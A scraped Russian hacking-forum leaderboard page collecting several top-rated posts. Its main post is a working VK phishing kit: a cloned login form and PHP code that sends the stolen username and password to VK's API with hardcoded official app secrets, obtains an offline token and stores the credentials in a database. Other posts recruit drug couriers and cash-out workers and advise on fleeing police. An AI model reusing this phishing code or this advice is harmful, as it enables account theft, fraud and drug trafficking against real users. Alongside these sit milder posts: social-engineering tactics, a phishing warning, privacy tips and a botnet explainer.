Таблица лидеров
-
в Сообщения
- Все области
- Adverts
- Advert Questions
- Advert Reviews
- Файлы
- Комментарии к файлам
- Отзывы к файлам
- Записи блога
- Комментарии блога
- Изображения
- Комментарии к изображениям
- Отзывы к изображению
- Альбомы
- Комментарии к альбому
- Отзывы к альбому
- События
- Комментарии к событиям
- Отзывы к событиям
- Сообщения
- Статусы
- Ответы на статус
-
Пользовательская дата
-
Всё время
9 октября 2021 - 29 октября 2025
-
Год
29 октября 2024 - 29 октября 2025
-
Месяц
29 сентября 2025 - 29 октября 2025
-
Неделя
22 октября 2025 - 29 октября 2025
-
Сегодня
29 октября 2025
-
Пользовательская дата
25.10.2022 - 25.10.2022
-
Всё время
Популярные публикации
Отображаются публикации с наибольшей репутацией на 25.10.2022 в Сообщения
-
1 баллКомпания примет на работу курьера-укладчика, экспедитора, обнальщика, оператора. Минимальная заработная плата (в день): для курьера: 7 000 в день для экспедитора: 30 000 в день для обнальщика: 104 000 в день для оператора: 15 000 в день Требования: от 21 лет, опыт работы, наличие необходимой техники и оборудования. Услови работы оговариваются при личном собеседовании в телеграм: https://t.me/anonymous_courier.
-
1 баллВ этой теме я покажу скрипт авторизации по логину и паролю с дальнейшей проверкой на валид (без уведомлений). Предположим, у вас есть сайт под фишинг и все что вам нужно это сам механизм фишинга. Суть механизма заключается в том, что мы будем отправлять данные из HTML-форм на сервера вконтакте. В ответ мы получим access token. Делать мы это будем с помощью cUrl и прямой авторизации через API VK. Выполнять авторизацию будем, представляясь официальным приложением. Запрос на прямую авторизацию выглядит примерно так: https://api.vk.com/oauth/token?grant_type=password&client_id=[наше значение]&scope=[наше значение]&client_secret=[наше значение]&username=[наше значение]&password=[наше значение] Что все это значит: clenit_id - это id нашего приложения. Запишем в client_id значение 2274003. scope - права доступа, необходимые приложению. Усложнять себе жизнь мы не будем, а просто запросим офлайн токен, записав в scope значение "offline". Этого будет достаточно, чтобы входить на страницу ВК по токену через apidog.ru. !Важно: такой токен "живет" до тех пор, пока пользователь не сменит пароль, либо завершит все сессии в настройках безопасности. client_secret - секретный ключ Вашего приложения. Будет равен hHbZxrka2uZ6jB1inYsH username - логин пользователя ВКонтакте password - пароль пользователя ВКонтакте Варианты официальных clenit_id и client_secret Android: client_id: 2274003 client_secret: hHbZxrka2uZ6jB1inYsH IPhone: client_id: 3140623 client_secret: VeWdmVclDCtn6ihuP1nt IPad: client_id: 3682744 client_secret: mY6CDUswIVdJLCD3j15n Windows desktop: client_id: 3697615 client_secret: AlVXZFMUqyrnABp8ncuU Windows phone: client_id: 3502557 client_secret: PEObAuQi6KloPM4T30DV Теперь необходима форма авторизации как в вк. Создадим php документ authorize.php <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <?php $errorGet = $_GET['error_login']; if (!$errorGet) { echo "<style> #hide_row_pass {display: none;} </style>"; } else { echo "<style> #hide_row_pass {display: block;} </style>"; } ?> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <title>ВКонтакте | Вход</title> <link rel="stylesheet" type="text/css" href="css/al/common.css?34795707965" /><link rel="stylesheet" type="text/css" href="css/al/fonts_cnt.css?5181750877" /> <link type="text/css" rel="stylesheet" href="css/api/oauth_popup.css?29651175773"></link> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="images/icons/favicons/fav_logo_2x.ico?8"></link> </head> <body class="VK oauth_centered"> <script> if (window.devicePixelRatio >= 2) document.body.className += ' is_2x'; </script> <div class="oauth_wrap"> <div class="oauth_wrap_inner"> <div class="oauth_wrap_content" id="oauth_wrap_content"> <div class="oauth_head"> <a class="oauth_logo fl_l" href="https://vk.com" target="_blank"></a> <div id="oauth_head_info" class="oauth_head_info fl_r"> <a class="oauth_reg_link" href="https://vk.com/join?reg=1" target="_blank">Регистрация</a> </div> </div> <div class="oauth_content box_body clear_fix"> <div class="box_msg_gray box_msg_padded">Для продолжения Вам необходимо войти <b>ВКонтакте</b>.</div> <form method="POST" id="login_submit" action="login.php"> <div class="oauth_form"> <div id="hide_row_pass" class="box_error">Указан неверный логин или пароль.</div> <div class="oauth_form_login"> <div class="oauth_form_header">Телефон или email</div> <input type="text" class="oauth_form_input dark" name="login" value=""> <div class="oauth_form_header">Пароль</div> <input type="password" class="oauth_form_input dark" name="password" /> <button class="flat_button oauth_button button_wide" id="install_allow" type="submit" name="submit_login">Войти</button> <a class="oauth_forgot" href="https://vk.com/restore" target="_blank">Забыли пароль?</a> </div> </div> </form> </div> </div> </div> </div> </body> </html> Архив со всеми стилями и картинками: https://yadi.sk/d/oVB9HuhdIi_3Rw VT: https://www.virustotal.com/#/url-analysis/u-ed0fa25a82001fa36b9c7db58ac426bc1699f63284192c5f8f28239e0aa42408-1539339204 Теперь нужен файл, который будет отсылать логин и пароль на авторизацию и получение токена. Назовем login.php Но перед этим создадим БД куда будем записывать все валидные данные. 1. Переходим на хостинге в PhpMyAdmin и нажимаем "Создать" 2. Создадим таблицу на 7 столбов: 3. Параметры id, Логин (login), Пароль (password), Токен (token), Дата (date), Имя(first_name) и Фамилия(last_name) зададим как на картинке В параметрах столбца id должен быть отмечен параметр "A_I" (auto_increment) и стоять PRIMARY KEY. Теперь сам файл login.php <?php //Создадим headers $headers = array( 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'content-type' => 'application/x-www-form-urlencoded', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36' ); //Запишем сюда значения логина и пароля из HTML формы $login = $_POST['login']; $password = $_POST['password']; //Если какое-то поле оказалось пустым if (empty($login) or empty($password)) { //Отправим пользователя на стартовую страницу authorize и просигнализируем об ошибке header('Location: /authorize.php?error_login=true'); exit; } else { //Если все поля заполнены, то посылаем запрос на получение токена по нашей ссылке выше $get_token = post ('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.'' ,array( 'headers' => array( 'accept: '.$headers['accept'], 'content-type: '.$headers['content-type'], 'user-agent: '.$headers['user-agent'] ) )); //Если авторизация прошла успешно if (preg_match("/[a-z0-9]{85}/", $get_token['headers'], $token)) { $token1 = json_decode(file_get_contents('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.''), true); $data = json_decode(file_get_contents('https://api.vk.com/method/users.get?user_id='.$token1['user_id'].'&access_token='.$token[0].'&fields=uid,first_name,last_name&v=5.80'), true); //Записываем в переменную текущую дату и время сервера $date_l = date("H:i:s d-m-Y"); //Подключаемся к БД $host="localhost"; $user=""; //Имя пользователя от MySql $pass=""; //Пароль от MySql $db_name=""; //Имя базы $link=mysql_connect($host,$user,$pass); mysql_select_db($db_name,$link); mysql_query("set names utf8"); //Выполняем запись валида в БД $sql = mysql_query("INSERT INTO vk(login, password, token, date, user_id, first_name, last_name) VALUES('".$login."','".$password."','".$token[0]."','".$date_l."','".$token1['user_id']."','".$data['response'][0]['first_name']."','".$data['response'][0]['last_name']."')"); //Если все прошло успешно, то перенаправляем пользователя на vk.com или на ваш сайт if ($sql) { session_start(); $_SESSION['logged_user'] = $data['response'][0]['first_name']; header('Location: vk.com/'); //Если при записи обнаружены ошибки, то перенаправим пользователя на главную страницу нашего сайта с сообщением об ошибке } else header('Location: /authorize.php?error_login=true'); //Закрываем соединение mysql_close($link); exit; } //Если авторизация не прошла, то отправим пользователя на стартовую страницу с ошибкой else header('Location: /authorize.php?error_login=true'); } //cUrl POST function post($url = null, $params = null, $proxy = null, $proxy_userpwd = null) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); if(isset($params['params'])) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $params['params']); } if(isset($params['headers'])) { curl_setopt($ch, CURLOPT_HTTPHEADER, $params['headers']); } if(isset($params['cookies'])) { curl_setopt($ch, CURLOPT_COOKIE, $params['cookies']); } if($proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy); if($proxy_userpwd) { curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy_userpwd); } } $result = curl_exec($ch); $result_explode = explode("\r\n\r\n", $result); $headers = ((isset($result_explode[0])) ? $result_explode[0]."\r\n" : '').''.((isset($result_explode[1])) ? $result_explode[1] : ''); $content = $result_explode[count($result_explode) - 1]; preg_match_all('|Set-Cookie: (.*);|U', $headers, $parse_cookies); $cookies = implode(';', $parse_cookies[1]); curl_close($ch); return array('headers' => $headers, 'cookies' => $cookies, 'content' => $content); } ?> В переменные $host="localhost"; $user=""; //Имя пользователя от MySql $pass=""; //Пароль от MySql $db_name=""; //Имя базы вписываем наши данные На 50 строчке если авторизация прошла успешно, нужно перенаправить пользователя на ваш сайт или куда вам угодно. header('Location: "Ваш сайт" '); Осталось залить все файлы на хостинг и можно фишить.
-
1 балл
-
1 балл
-
1 баллКак будто не тему про СИ прочел , а ебаный пикап мастеров гайд
-
1 баллЧеловек выложил статья которую считает интересной , а уж укрдена она или нет, не так важно
-
1 балл
-
1 баллИспользующие приемы социальной инженерии киберпреступники за последние годы взяли на вооружение более продвинутые методы, которые позволяют с большей долей вероятности получить доступ к нужной информации, используя современную психологию сотрудников предприятий, да и людей в целом. Первым шагом в противостоянии такого вида уловкам является понимание самих тактик злоумышленников. Рассмотрим восемь основных подходов к социальной инженерии. В 90-е понятие «социальная инженерия» ввел в употребление Кевин Митник, знаковая фигура в сфере информационной безопасности, бывший хакер серьезного уровня. Однако злоумышленники использовали такие методы задолго до появления самого термина. Специалисты убеждены, что тактика современных киберпреступников завязана на преследовании двух целей: кража паролей, установка вредоносной программы. Злоумышленники пытаются применить социальную инженерию, используя телефон, электронную почту и Сеть. Ознакомимся с основными методами, помогающими преступникам добывать необходимую им конфиденциальную информацию. Тактика 1 Теория десяти рукопожатий. Главная цель злоумышленника, использующего телефон для социальной инженерии, состоит в том, чтобы убедить свою жертву в одном из двух моментов: Жертве звонит сотрудник компании; Звонит представитель уполномоченного органа (например, правоохранитель или аудитор). Если преступник ставит себе задачу собрать данные об определенном сотруднике, он может сначала связаться с его коллегами, пытаясь всяческими способами выудить нужные ему данные. Припоминаете старую теорию шести рукопожатий? Так вот, специалисты в области безопасности утверждают, что между киберпреступником и его жертвой может быть всего десять «рукопожатий». Эксперты полагают, что современных условиях всегда нужно иметь небольшую паранойю, так как неизвестно, чего от вас хочет тот или иной сотрудник. Злоумышленники обычно выходят на секретаря (или занимающего похожую должность человека), чтобы собрать информацию о людях, стоящих выше по иерархии. Специалисты отмечают, что дружелюбный тон во многом помогает мошенникам. Медленно, но верно преступники подбирают к вам ключ, что вскоре приводит к тому, что вы делитесь информацией, которую бы раньше ни за что не открыли. Тактика 2 Изучение корпоративного языка. Как известно, у каждой отрасли есть свои специфические формулировки. Задача злоумышленника, пытающегося добыть необходимую информацию, — изучить особенности такого языка, чтобы более искусно использовать приемы социальной инженерии. Вся специфика кроется в изучении корпоративного языка, его терминов и особенностей. Если киберпреступник будет говорить на знакомом, привычном и понятном для его целей языке, он легче войдет в доверие и сможет быстрее заполучить необходимую ему информацию. Тактика 3 Заимствование музыки для ожидания во время звонков. Для осуществления успешной атаки мошенники нуждаются в трех составляющих: время, настойчивость и терпение. Зачастую кибератаки с использованием социальной инженерии производятся медленно и методично — собираются не только данные о нужных людях, но и так называемые «социальные сигналы». Это делается для того, чтобы заполучить доверие и обвести цель вокруг пальца. Например, злоумышленники могут убедить ту персону, с которой они общаются, в том, что они коллеги. Одной из особенностей такого подхода является запись музыки, которую компания использует во время звонков, в момент, когда звонящий ожидает ответа. Преступник сначала дожидается такой музыки, затем записывает ее, после чего использует в своих интересах. Таким образом, когда идет непосредственный диалог с жертвой, злоумышленники в какой-то момент говорят: «Подождите минутку, звонок по другой линии». Затем жертва слышит знакомую музыку и у нее не остается никаких сомнений, что звонящий представляет определенную компанию. В сущности, это лишь грамотный психологический трюк. Тактика 4 Спуфинг (подмена) телефонного номера. Преступники часто используют спуфинг телефонных номеров, что помогает им подменить номер звонящего абонента. Например, злоумышленник может сидеть у себя в квартире и звонить интересующему его лицу, однако на определителе номера отобразится принадлежащий компании номер, что создаст иллюзию того, что мошенник звонит, используя корпоративный номер. Разумеется, ничего не подозревающие сотрудники в большинстве случаев передадут конфиденциальную информацию, включая пароли, звонящему лицу, если идентификатор абонента принадлежит их компании. Такой подход также помогает преступникам избежать отслеживания, так как если перезвонить на этот номер, вы будете переадресованы на внутреннюю линию компании. Тактика 5 Использование новостей против вас. Какими бы ни были заголовки текущих новостей, злоумышленники используют эту информацию в качестве приманки для спама, фишинга и других мошеннических действий. Не зря специалисты в последнее время отмечают рост числа спам-писем, темы которых касаются президентских кампаний и экономических кризисов. Из примеров можно привести фишинговую атаку на какой-либо банк. В электронном письме говорится примерно следующее: «Другой банк [имя банка] приобретает ваш банк [имя банка]. Нажмите на эту ссылку, чтобы убедиться, что информация о вашем банке обновлена, пока сделка не закрыта». Естественно, это попытка заполучить информацию, с помощью которой мошенники смогут войти в ваш аккаунт, украсть ваши деньги, либо продать вашу информацию третьему лицу. Тактика 6 Использование доверия к социальным платформам. Ни для кого не секрет, что сайты Facebook, Myspace и LinkedIn представляют собой чрезвычайно популярные социальные сети. Согласно исследованию экспертов, люди склонны доверять таким платформам. Таким образом, многие пользователи будут доверять электронному письму, если в нем будет утверждаться, что оно пришло от Facebook. Частым приемом является утверждение, что соцсеть проводит техническое обслуживание, вам надо «нажать здесь», чтобы обновить информацию. Именно поэтому специалисты рекомендуют сотрудникам предприятий вводить веб-адреса вручную, чтобы избежать фишинговых ссылок. Также стоит иметь в виду, что сайты в очень редких случаях направляют пользователям запрос на изменение пароля или обновление учетной записи. Тактика 7 Тайпсквоттинг. Эта вредоносная техника примечательна тем, что злоумышленники используют человеческий фактор, а именно ошибки при введении URL-адреса в адресную строку. Таким образом, ошибившись всего на одну букву, пользователь может попасть на сайт, созданный специально для этих целей злоумышленниками. Киберпреступники тщательно подготавливают почву для тайпсквоттинга, следовательно, их сайт будет как две капли воды похож на тот легитимный, который вы хотели первоначально посетить. Таким образом, допустив ошибку в написании веб-адреса, вы попадаете на копию легитимного сайта, целью которого является либо продажа чего-либо, либо кража данных, либо распространение вредоносных программ. Тактика 8 Использование FUD для воздействия на ранок ценных бумаг. FUD — тактика психологической манипуляции, применяемая в маркетинге и пропаганде вообще, заключающаяся в подаче сведений о чем-либо (в частности, продукте или организации) таким образом, чтобы посеять у аудитории неуверенность и сомнение в его качествах и таким образом вызвать страх перед ним. Согласно последним исследованиям Avert, безопасность и уязвимость продуктов и даже целых компаний может повлиять на рынок акций. Например, исследователи изучили влияние таких событий, как «Вторник патчей от Microsoft» (Microsoft Patch Tuesday) на акции компании, обнаружив заметное колебание каждый месяц после того, как публикуется информация об уязвимостях. Также можно вспомнить, как злоумышленники в 2008 году распространили ложную информацию о здоровье Стива Джобса, что повлекло за собой резкое падение акций компании Apple. Это самый характерный пример использования FUD в злонамеренных целях. Помимо этого, стоит отметить использование электронной почты для реализации техники «pump-and-dump» (схема манипуляций биржевым курсом на фондовом рынке или на рынке криптовалют с последующим обвалом). В этом случае злоумышленники могут разослать электронные письма, описывающие потрясающий потенциал акций, которые они заранее скупили. Таким образом, многие будут стараться скупить эти акции как можно скорее, а они будут увеличиваться в цене. Выводы Зачастую киберпреступники крайне изобретательны в своем использовании социальной инженерии. Ознакомившись с их методами, можно сделать вывод, что различные психологические трюки очень помогают злоумышленникам добиваться поставленных целей. Исходя их этого, стоит обращать внимание на любую мелочь, которая может невольно выдать мошенника, проверять и перепроверять информацию о связывающихся с вами людях, особенно если обсуждается конфиденциальная информация.
-
1 балл
-
1 баллЭта пренеприятная ситуация с большей вероятностью может произойти не с вами, а с вашей девушкой. Насилие в лифте — нередкая история, а потому сегодняшние рекомендации обязательно перескажите подруге — они универсальны. Не садитесь в лифт с подозрительно незнакомыми людьми (тем более если их несколько) Вы в лифте, а в подъезд вбегает неизвестный мужик иорет: «Подожди!». Спокойно уезжайте. Вы входите в подъезд, а в лифте опять же незнакомец — придержал ногой двери, мол, заходи. Вежливо улыбнитесь ему и вперед по лестнице. Если стесняетесь и думаете, что вас сочтут трусом, достаньте мобильник, сделайте вид, что вам позвонили. Если уж вы оказались в лифте с незнакомым мужиком, сосредоточьтесь Прижмитесь спиной к стенке — пусть он нажимает нужный этаж. Пакеты из магазина поставьте на пол. Левую руку приведите в защитное положение, как бы задумчиво потирая нос и подбородок, вторую держите на уровне живота. Не шел ли он за вами по улице к подъезду? Кажется ли он подозрительным? В каком положении его руки? В карманах? Или одна за спиной? Он нервничает? Напряжен? Сами смотрите ему на линию плеч рассеянным взглядом — так вы увидите его целиком. Ждите, когда он выйдет из лифта Если ваш этаж — выходите, все время держа его в поле зрения, как бы смешно это ни выглядело (это предотвратит захват сзади). Ну а если на вопросы из пункта 2 вы ответили утвердительно, будьте готов ко всему. Видите резкое движение плечом, быстрый шаг в вашу сторону — бейте первым. Сгруппировавшись (руки в блоке), резко сближайтесь, врезаясь в него предплечьями Схватите его за одежду или за шею и бейте коленом в пах. Он согнулся — бейте локтем или кулаком-молотом сверху в затылок, быстро, несколько раз. Он поплыл — со всей силы впечатайте его головой в стенку. Он на полу — несколько раз прыгните ему на руку или ногу, чтобы не смог напасть снова. Если сомневались до последнего и дождались, что он напал на вас, действуйте так же — молниеносно и уверенно Гад прижал вас к стенке — хватайте его за уши и бейте головой в нос. Нет места — обхватите его голову и что есть силы надавите большими пальцами на глаза. Открылся кадык — со всей силы давите на него. И все это должно сопровождаться вашим самым громким криком, пусть жильцы услышат. При первой возможности — вон из лифта (и повнимательнее на выходе, вдруг он был не один).
-
1 балл
-
1 баллВ твоей жизни всегда может произойти какая-нибудь хуйня, и ты к ней абсолютно не будешь готов. Побег от мусоров - одна из таких вещей. За свою недлинную жизнь я уже успел попробовать сделать много того, за что дают срок, или просто после чего будет очень плохо. Как правило все обходилось, но были случаи, когда все переставало идти по плану... Время идет, и что-то забывается, но все же я постараюсь рассказать как это было у меня и попробую дать пару советов. С чего начать Меня пытались повязать по разным причинам, начиная от того, что бухал с братвой под подъездами, заканчивая... И так блядь получалось, что и валить приходилось либо одному, либо с кем-то. Сейчас я расскажу про, наверно, самый стремный эпизод моей жизни. И нет, не потому, что я натворил хуйни и мне светила статья, а потому что это был первый мой раз, и много чего можно было сделать по-другому. Это был вечер последнего дня весны, родители куда-то поехали, ну а я остался. И как полагается после конца учебного года я решил наебенеться с друганами. Хуй знает, чё мы решили пойти гулять по городу, а не пошли на хату. И вот знаешь, наверно в каждой компании есть такой ебанутый мудила, который все похерит, причем в самый неподходящий момент. И вот, имея при себе всякие ништяки и уже чутка бухнувшие, мы решили остановиться на остановке. Один чувак решил отлить, пока мы ждали автобус. И вроде нихуя не предвещало беды, если бы не одно НО, этот чувак никогда, сука просто никогда не мог удержаться при виде ментов и не крикнуть, что-то на подобии "пошли нахуй ебаные мусо...". Но это только пол беды. Этот тип, пока сцал, как-то успел поджечь рекламный банер... И угадай, кто в этот момент проезжал мимо и что они услышали, когда вышли из машины?! Даблкилл... Мы все знали, что примерно надо делать в таких ситуациях, и поэтому рванули в сторону домов, где сложно ехать ментам... Если решил - то беги! Пока мы бежали, успели растеряться, да оно и к лучшему, ебать толпу легко заметить. А в то время за нами уже приехали еще пару машин. Я бежал и все время оглядывался, и видел, что за мной хвост. В какой-то момент я остановился и спрятался за деревом, в надежде, что они не заметят и пробегут мимо. Бля, так и произошло. Когда ты убегаешь, то делай то, что они не ожидают. Пытайся скрыться с виду. Но лучше не лезь под машины или в мусорные баки, про это они знают. А вот, как бы это тупо не звучало, спрятаться за деревом или кустом, как я тогда, - другое дело. Когда часть из них пробежала меня, я решил продолжить, и тоже побежал. И сука тут произошло самое хуевое, что могло. Я упал... И что делать, они рядом?! Да и скорее всего услышали... Тут пришла пиздатая идея, я понимал, что если продолжу, то со своими разъебаными в кровь ногами я далеко не убегу, а если даже оторвусь, то не факт, что впереди чисто. Я решил сделать вид, что не при чем. Сел то ли на качели, то ли начал подтягиваться. Утром понял, я въебался в детскую площадку. Бля, меня тогда пронесло еще раз... Прятки Домой идти не вариант, там могут ждать, да и вообще сначала надо как-то выбраться. И пока более менее тихо я побежал к подъезду. Забрался на чердак и сидел. Там я понял, что проебал один кроссовок, расхуячил колено и посеял плеер. Что бы было, если бы потерял паспорт... В том момент мне было очень хуево. А я ждал, ждал... Утром я аккуратно спустился, попытался просмотреть улицу через окно дома, и решился пойти. Эпилог В тот вечер всем повезло, хотя бывало, что и меня ловили. Тут следует помнить: Если побежал - то не останавливайся. Догонят отпиздят нахуй, и от тебя останется мокрое место. Не поддавайся эмоциям. Кому-то адреналин помогает, а кому-то бьет в мозг, и все, это конец. Вещи - хуйня, их не страшно оставить. Если ты заранее знаешь, что тебя могут словить, то я думаю не стоит брать документы с собой. Друзья - НЕ хуйня, если видишь, что братан упал и его гасят, то помоги ему. Здравый смысл, ты - обычный человек, а не супермен. Если даже тебя поймали, то пытайся найти момент и съебись. Беги, просто беги!
-
1 баллАнтивирусная компания ESET предупреждает о новой фишинговой атаке, нацеленной на пользователей Apple. Для кражи персональных данных злоумышленники используют «двойную» рассылку. В первом письме от мошенников пользователю сообщают о несуществующей покупке приложения в App Store. В сообщении указаны детали заказа, включая сумму сделки. На подделку указывает адрес отправителя, не имеющий отношения к Apple, неперсонализированное обращение («Дорогой клиент») и подозрительный документ во вложении. Если пользователь не обратит внимания на эти признаки и откроет вложенный файл, он обнаружит «квитанцию об оплате». В квитанции есть ссылка, которую предлагается использовать в случае проблем с заказом, – конечно, она ведет на фишинговый сайт. Там пользователю нужно ввести Apple ID и пароль, а далее «подтвердить личные данные», в том числе, данные банковской карты. Особенность этой фишинговой кампании в том, что далее потенциальная жертва получит еще одно сообщение со ссылкой на тот же сайт. Второе письмо (от лица «Службы технической поддержки Apple») предупреждает, что часть информации об учетной записи пользователя не подтверждена. Чтобы продолжить использование сервисов Apple, пользователю предлагается подтвердить данные, заполнив форму на фишинговом сайте. ESET рекомендует игнорировать неперсонализированные сообщения, не переходить по ссылкам из них, а также защитить компьютер комплексным антивирусным продуктом с функциями «Антифишинг» и «Антиспам».
-
1 балл
-
1 балл
-
1 баллБолее чем в половине всех устройств на базе Android зияет огромная дыра в безопасности. Сегодня мы попробуем закрыть эту дыру, и в целом анонимизировать систему, используя полезные приложения и решения, о которых я расскажу ниже! Comodo Mobile Security - одно из самых функциональных и гибко настраиваемых приложений для бесплатной защиты мобильных устройств на базе Андроид. Кроме типичного набора антивирусных модулей, в нём есть такие дополнения, как менеджер трафика,показывающий в реальном времени всю сетевую активность всех активных приложений: в сотовых 3G/4G сетях и при подключении по Wifi. С правами администратора (Суперпользователя)в менеджере трафика есть возможность использовать простой программный фаервол(межсетевой экран). Clean Master - удаление следов работы и антивирус. History Eraser - ещё одна программа для удаления следов работы. Orbot - Tor для Android. ProxyDroid - настройка прокси на Android устройстве. Smart App Lock - защита приложений паролем, а также защита соединений (блокировка подключений к интернету, работы с внешним USB-накопителем,исходящих телефонных вызовов). SSH Tunnel Android - SSH туннелирование для Android. TunnelBear VPN - позволяет скрыть свой IP с помощью технологий VPN. TextSecure Private Messenger - мессенджер с защищенной перепиской. RedPhone Private Calls - мессенджер для защищенной переписки и интернет - телефонии. Cryptocat - сервис как для мобильного телефона, так и для ПК. У него есть собственные дополнения для браузеров Firefox, Chrome, Safari и Opera, предназначенная для быстрого доступа к чату. Чат предлагается групповой, причем можно устроить переписку с помощью сервера Cryptocat или же переместиться на другой сервер. NoRoot Firewall - фаервол без Root-прав. Viaprotect - приложение для проверки защищенности смартфона, контроля трафика, скачивать нужно с официального сайта разработчиков - www.viaprotect.com. Shark - для профессионалов рекомендую этот сниффер сетевого трафика. Сниффер записывает логи в формате .pcap и хранит их на SD-карте телефона. Файл с логами можно просмотреть на Windows, так и в самом телефоне, при помощи утилиты Shark Reader. CyanogenMod - кастомная прошивка с открытым исходным кодом, в отличии от других альтернативных прошивок, работает на большинстве устройств. Лично я советую использовать именно её, ниже прикреплю статью по одной из возможных сборок для анонимности на этой базе. Программное обеспечение и инструкции можно найти на cyanogenmod.org OmniROM - ответвление от проекта CyanogenMod, базируется на Android 4.4. Поддерживается некоторыми моделями Samsung, HTC, LG. Информацию по установке и ссылки на загрузки ищите на omnirom.org. Paranoid Android - даёт много возможностей настройки внешнего вида графического интерфейса пользователя. Официально работает примерно с 20 устройствами,неофициально - примерно с 60. Сайт разработчика aospa.co. SlimROMs - для пользователей,предпочитающих максимальную производительность всякому украшательству. Актуальные версии прошивок вместе с инструкциями по установке, ищите на slimroms.net. Понятно, что бороться с утечками в смартфонах, основанных на проприетарных операционных системах, — занятие неблагодарное. Нет открытых исходников — нет доказательств отсутствия скрытых закладок. Чтобы получить хоть сколько-нибудь анонимизированный смартфон, нам понадобится гугло-фон. И не просто гуглофон, а тот, для которого есть официальная версия последней прошивки CyanogenMod и открытые исходники ядра (стоковая прошивка или ядро Android-смартфона также могут содержать бэкдоры). Когда эти требования будут выполнены, берем смартфон в руки, получаем root - права (как это сделать,можно найти в интернете), регистрируемся в Google Play, устанавливаем приложение ROM Installer и прошиваем с его помощью CyanogenMod. Обязательно отказываемся от установки Google Apps. Их придется принести в жертву великому богу конфиденциальности. После первой загрузки CyanogenMod предложит зарегистрировать или подключить аккаунт CM, а также включить отправку анонимной статистики. Разумеется, от выполнения этих процедур, следует отказаться. Далее приступим к начальной настройке прошивки. Идем в настройки и отмечаем следующие пункты: Беспроводные сети ==> Еще ==> NFC ==> Отключить. Безопасность ==> Блокировка экрана ==> PIN-код. Безопасность ==> Неизвестные источники. Ничего особенного, стандартные опции. Потом нам следует обезопасить себя от утечек данных из предустановленных приложений и софта, который будет установлен позже. В CyanogenMod для этого есть механизм Privacy Guard, который занимается обфускацией личных данных пользователя, подсовывая вместо них рандомные данные: случайно сгенерированное имя юзера вместо реального, случайные координаты и прочее. Чтобы его активировать, идем в Настройки - Конфиденциальность - Защищенный режим и включаем опцию Защищенный режим по умолчанию. Теперь он будет активироваться для всех устанавливаемых приложений. Чтобы активировать Privacy Guard для стоковых приложений, нажимаем кнопку настроек сверху (три точки), отмечаем опцию «Системные приложения» и выбираем все приложения, кроме Trebuchet (это рабочий стол). По умолчанию Privacy Guard настроен таким образом, чтобы спрашивать юзера каждый раз, когда приложение пытается получить доступ к личным данным. Разрешать это действие стоит только в том случае, если такие данные ему реально нужны (например, телефон пытается прочитать адресную книгу). На этом все, надеюсь, что вам пригодится данная информация!
-
1 баллОтветь в Телеге, деньги у гаранта уже !!!
-
1 баллБотнет (англ. botnet) —сегодня распространенная проблема в интернете и его безопасности, это сеть компьютеров иногда серверов, которые через уязвимости в ПО или по обычной глупости юзеров заражены вирусами и троянами предназначенными для «зомбирования» вашего пк (обычно потому управляют через удаленный контроль или скрытого пользователя), цель которых в первую очередь не навредить вашим данным или удалить их, а превратить компьютер в «зомби» (или бота), в таком состоянии в котором злоумышленник сможет использовать вычислительные ресурсы компьютера в своих целях. Как вариант — использовать как анонимный удаленный пк в незаконных схемах(кардинг, теневой бизнес и др) В одним из крупнейших известных ботнетов контролировал сеть более чем на 12 млн. Это стало известно в марте 2010, хакера который его запустил так и не поймали Основная опасность и возможности Ботнета Список возможностей ботнета сам по себе довольно большой как и способы применения их различаются( и каждый день меняются и добавляются новые), но в основном все они разделяются на такие категории: 1. Loader: есть почти во всех вирусах и троянах использующие для ботнета. Обновляет или устанавливает старые версии бота, загружает через сеть все что нужно хакеру и не нужно вам (трояны, новые боты и т. д.). С помощью этой программы на все компьютеры одновременно могут быть установлены троянские программы шпионы, которые передают все, когда-либо введенные на данном компьютере данные.( это может быть даже данные кредитной карты или банковский аккаунт) Keylogger: перехват и сохранение введенных на клавиатуре символов с последующей отправкой хакерам. ( как вы понимаете количество данных и возможности такого вируса не ограничены, поскольку такой логгер записывает что и где вводите например на сайте сбербанка данные о карте и прочие) 2. DDoS: атакует сервера или другие пк путём перегрузки множеством запросов от сети ботов. Такая атака может полностью положить сервер или пк, или серьезно навредить его работе . Иногда его используют для кибер-шантажа, требуя выкуп для остановки атаки. Разумеется и в и политических целях, атакуя правительственные сайты и прочие интересные ресурсы (Например хакеры из группировки анонимус часто наказывает своих недругов именно таким способом и являются владельцами одних из самых крупных сетей ботнет). Одной из успешных и известных атак на сервера майкрософта с помощью вируса-трояна «MSBlast!», который в один день начал долбить запросами со всех компьютеров адрес microsoft.com, из-за чего сайт ушел в отстой и падал пару раз. 3. Spam: (более 80% мирового трафика загружено такими вирусами и сообщениями) заранее заготовленный шаблон спам-сообщения и начать рассылку спама на указанные адреса, и часто в самих сообщения встроен loader, а как мы уже знаем он может загрузить все остальное ... 4. Proxy: использовать компьютера из сети ботнет как прокси-сервер для анонимности, то есть шифрование трафика хакера, который будет пользоваться вашим пк, часто используют кардеры и дельцы теневого бизнеса( а опасность заключается в том что потом приедут за вами и доказать свою невинность будет очень трудно, а иногда даже невозможно 5.VNC Это удаленный доступ к вашему ПК, часто используется для Cryptomining криптовалют — Это заражение компьюетра скрытым майнером и его подальшие распространение по сети то есть в нем встроенные почти все 